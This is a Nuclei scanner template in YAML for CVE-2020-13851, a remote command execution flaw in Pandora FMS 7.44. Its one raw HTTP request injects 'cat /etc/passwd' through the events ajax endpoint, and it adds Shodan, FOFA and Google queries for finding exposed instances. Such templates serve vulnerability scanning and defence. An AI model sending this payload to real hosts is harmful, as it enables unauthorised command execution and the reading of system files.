58 lines
1.8 KiB
YAML
58 lines
1.8 KiB
YAML
id: CVE-2020-13851
|
|
|
|
info:
|
|
name: Artica Pandora FMS 7.44 - Remote Code Execution
|
|
author: theamanrawat
|
|
severity: high
|
|
description: |
|
|
Artica Pandora FMS 7.44 allows remote command execution via the events feature.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/158390/Pandora-FMS-7.0-NG-7XX-Remote-Command-Execution.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-13851
|
|
- https://www.coresecurity.com/advisories
|
|
- https://github.com/hadrian3689/pandorafms_7.44
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.8
|
|
cve-id: CVE-2020-13851
|
|
cwe-id: CWE-78
|
|
epss-score: 0.96994
|
|
epss-percentile: 0.99737
|
|
cpe: cpe:2.3:a:pandorafms:pandora_fms:7.44:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: "true"
|
|
max-request: 1
|
|
vendor: pandorafms
|
|
product: pandora_fms
|
|
shodan-query:
|
|
- title:"Pandora FMS"
|
|
- http.title:"pandora fms"
|
|
fofa-query: title="pandora fms"
|
|
google-query: intitle:"pandora fms"
|
|
tags: cve2020,cve,packetstorm,rce,pandora,unauth,artica,pandorafms
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- 'root:.*:0:0:'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
- "PHPSESSID="
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a004730450220297e712cf0aa4f545311067d6a89572158fd49b233d0f073a0ebc3305ac801410221009d6b14a57c310ebdfd16e5bcc82176aff493913a1ea7fd65f3a4fd4c697dc555:922c64590222798bb761d5b6d8e72950 |